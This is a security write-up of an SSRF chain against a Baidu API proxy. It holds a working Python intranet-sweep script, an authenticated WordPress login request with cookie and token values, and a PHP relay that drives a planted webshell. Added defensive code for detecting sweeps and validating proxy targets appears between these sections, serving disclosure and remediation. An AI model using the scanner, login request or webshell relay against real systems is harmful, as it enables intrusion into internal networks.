A Baidu WebShell from SSRF to Intranet
All stories start with a simple SSRF...
1. An SSRF
http://apistore.baidu.com/astore/toolshttpproxy
The tool gives full control over the forwarded request, including the method (GET, POST and so on).
2. Intranet Detection
First, collect some intranet IP addresses from DNS brute-forcing, then write a script to probe them through the proxy.
Test script
# encoding=utf-8
# Python 2 script: sends one GET per address in 172.22.1.0/24 through the proxy
# endpoint and records every host that answers.
import httplib
import json
import sys
import traceback
import urllib

reload(sys)
sys.setdefaultencoding('utf8')

headers = {
    'Cookie': 'add your own',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0',
}

for i in range(1, 255):
    try:
        print i
        s = "172.22.1.%s" % i
        conn = httplib.HTTPConnection('apistore.baidu.com')
        conn.request(method='POST', url="/astore/toolshttpproxysend",
                     body='reqMethod=GET&reqUrl=http%3A%2F%2F' + s + '&token=token',
                     headers=headers)
        msg = json.loads(conn.getresponse().read())
        # retMsg is "success" only when the proxy reached the target
        if msg["retMsg"] == "success":
            print s
            f = open('rrrr.txt', 'ab+')
            f.write(s + '\r\n')
            f.write(urllib.unquote(msg["retData"]["responseHeader"]).replace('<br/>', '\r\n') + '\r\n')
            f.write(urllib.unquote(msg["retData"]["responseBody"]).replace('<br/>', '\r\n') + '\r\n\r\n')
            f.close()
        conn.close()
    except Exception:
        print traceback.format_exc()
Test results:
One WordPress install caught my attention.
http://172.22.1.19 (cdm.baidu.com)
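From the defender's side, the sweep above has a recognisable shape in the proxy's own access logs: one client asks the proxy for many distinct private addresses in a short time. The following detector is an added example, not code from the original writeup or from Baidu; the log format and the log lines are constructed sample data, and the only assumption is that the proxy records the client IP and the requested reqUrl per request.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample of access-log lines for an HTTP fetch proxy (not real logs):
# "<ISO timestamp> <client ip> <reqMethod> <reqUrl> <upstream result>".
# The first client walks 172.22.1.x one address after another, the way the
# probe script above does; the second client uses the proxy normally.
SAMPLE_LOG = """\
2015-03-04T10:00:01 203.0.113.5 GET http://172.22.1.1/ timeout
2015-03-04T10:00:02 203.0.113.5 GET http://172.22.1.2/ timeout
2015-03-04T10:00:03 203.0.113.5 GET http://172.22.1.3/ success
2015-03-04T10:00:04 203.0.113.5 GET http://172.22.1.4/ timeout
2015-03-04T10:00:05 203.0.113.5 GET http://172.22.1.5/ timeout
2015-03-04T10:00:06 203.0.113.5 GET http://172.22.1.19/ success
2015-03-04T10:00:07 203.0.113.5 POST http://172.22.1.19/wp-admin/ success
2015-03-04T10:00:08 198.51.100.7 GET http://www.example.com/api success
2015-03-04T10:00:09 198.51.100.7 POST http://www.example.com/api success
2015-03-04T10:00:10 192.0.2.9 GET http://127.0.0.1/ timeout
this line is malformed and is skipped
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Split one log line into a dict, or return None for malformed lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, result = m.groups()
    try:
        when = datetime.fromisoformat(ts)
    except ValueError:
        return None
    return {"ts": when, "client": client, "method": method, "url": url, "result": result}


def target_is_internal(url):
    """True when reqUrl names a non-global IP literal (RFC 1918, loopback, link-local, ...)."""
    host = urlsplit(url).hostname
    if not host:
        return False
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        # A hostname rather than a literal: it must be resolved before it can be judged,
        # which this log-only detector does not do.
        return False


def find_scanners(log_text, window=timedelta(minutes=5), threshold=5):
    """Return {client: sorted internal hosts} for every client that reached at least
    `threshold` distinct internal addresses through the proxy inside one time window."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and target_is_internal(ev["url"]):
            per_client[ev["client"]].append((ev["ts"], urlsplit(ev["url"]).hostname))
    alerts = {}
    for client, events in per_client.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {host for _, host in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[client] = sorted({host for _, host in events})
                break
    return alerts


if __name__ == "__main__":
    for client, hosts in find_scanners(SAMPLE_LOG).items():
        print("possible intranet sweep from %s: %d internal hosts, e.g. %s" % (client, len(hosts), hosts[:3]))
```

The threshold and window are tuning knobs; the point is that a legitimate user of a URL-fetch tool almost never asks for private addresses at all, so even a low threshold produces few false positives, and the single hit on 127.0.0.1 from the third client is left for a separate, stricter rule.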
3. WordPress weak password check
Weak-password testing still yields a number of hits.
Wanglu admin
Try one.
Log in with a POST first, then put the cookie obtained into the request headers.
http://apistore.baidu.com/astore/toolshttpproxysend?reqMethod=POST&reqUrl=http://172.22.1.19/wp-admin/&token=Response&reqHeaders[0][key]=Cookie&reqHeaders[0][value]=response=Response%7C%7C1425449844%7C%7C1425446244%7C%7C4bcc9f20e60d5905d3aaf9eda0c5fe28; bytes=0; woocommerce_cart_hash=0; wordpress_test_cookie=WP+Cookie+check; token=wanglu%7C1425449844%signature; token=wanglu%signature;
The HTML returned shows the back-end login succeeded.
Next comes the simple part: writing a shell through WordPress's template editing.
This step is tedious, but it works eventually.
4. Connect to webshell
To make operation easier, a PHP forwarding proxy runs locally.
<?php
// Local forwarding proxy: every POST field received here is re-sent through the
// proxy endpoint as reqBodyParams[i][key]/[value] to the shell, and the shell's
// output is echoed back to the caller.
$webshell = "http://apistore.baidu.com/astore/toolshttpproxysend";
$data = array();
$data['reqMethod'] = 'POST';
$data['reqUrl'] = 'http://172.22.1.19/wp-content/themes/salient-new/404.php';
$data['token'] = 'ae6e554399dd045278f4128312f13853';
$i = 0;
foreach ($_POST as $key => $value) {
    $data["reqBodyParams[$i][key]"] = $key;
    $data["reqBodyParams[$i][value]"] = urlencode($value);
    $i++;
}
$data = http_build_query($data);
$opts = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n"
                   . "Cookie: cookie\r\n"
                   . "X-Requested-With: XMLHttpRequest\r\n"
                   . "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n"
                   . "Content-Length: " . strlen($data) . "\r\n",
        'content' => $data,
    ),
);
$context = stream_context_create($opts);
$html = @file_get_contents($webshell, false, $context);
$data = json_decode($html, true);
echo urldecode($data["retData"]["responseBody"]);
?>
The chain is complete and access is obtained.
Solution:
Filter the proxy's target URL so that requests to intranet addresses are rejected.
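What that filter has to get right is the part most implementations miss: the decision must be made on the address the proxy will actually connect to, not on the text of the URL, and the connection must then go to that same address. The function below is an added example of such a check (it is not Baidu's code and is not part of the original writeup); it assumes the proxy passes the user-supplied reqUrl to validate_proxy_target before fetching anything, and the hostnames and answers in CONSTRUCTED_DNS are sample data used only so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Ranges a server-side fetch proxy must never contact. ipaddress's own flags
# cover most of them; the explicit list also catches CGNAT, "this network" and
# class E regardless of Python version.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "::ffff:0:0/96", "fc00::/7", "fe80::/10",
)]


def is_blocked_address(ip_text):
    """True if the address lies in a range the proxy must not reach."""
    addr = ipaddress.ip_address(ip_text.split("%")[0])  # drop a zone id such as fe80::1%eth0
    # An IPv4-mapped literal like ::ffff:172.22.1.19 is judged as its IPv4 form.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified:
        return True
    return any(addr in net for net in BLOCKED_NETWORKS)


def system_resolver(host, port):
    """Resolve host to the sorted set of IP strings connect() could use."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


# Constructed DNS answers so the example runs without network access.
CONSTRUCTED_DNS = {
    "cdm.baidu.com": ["172.22.1.19"],                    # an intranet name, as in the writeup
    "www.example.com": ["93.184.216.34"],
    "dual.example.com": ["93.184.216.34", "::1"],        # one public, one loopback answer
}


def constructed_resolver(host, port):
    return CONSTRUCTED_DNS.get(host, [])


def validate_proxy_target(url, resolver=system_resolver):
    """
    Decide whether a user-supplied reqUrl may be fetched.
    Returns (allowed, reason, pinned_ip). When allowed, the caller must connect
    to pinned_ip (still sending the original Host header) instead of resolving
    the name a second time, so a changed DNS answer cannot bypass the check.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme, None
    host = parts.hostname
    if not host:
        return False, "no host in URL", None
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed", None
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port", None
    try:
        ipaddress.ip_address(host)          # IP literal: judge it directly
        candidates = [host]
    except ValueError:                      # hostname: judge every address it resolves to
        try:
            candidates = resolver(host, port)
        except OSError:
            candidates = []
    if not candidates:
        return False, "host does not resolve", None
    for ip in candidates:
        if is_blocked_address(ip):
            return False, "target resolves to a blocked address: %s" % ip, None
    return True, "ok", candidates[0]


if __name__ == "__main__":
    for u in ("http://172.22.1.19/wp-admin/", "http://cdm.baidu.com/",
              "http://[::ffff:172.22.1.19]/", "https://www.example.com/api"):
        print(u, "->", validate_proxy_target(u, constructed_resolver))
```

Two points follow from the design. Every address a name resolves to is checked, because a name with one public and one private answer is enough to reach the intranet on the connect that happens to pick the private one. And redirects must go through the same function on every hop, since a public host that answers with a 302 to a private address is just the same problem one step later.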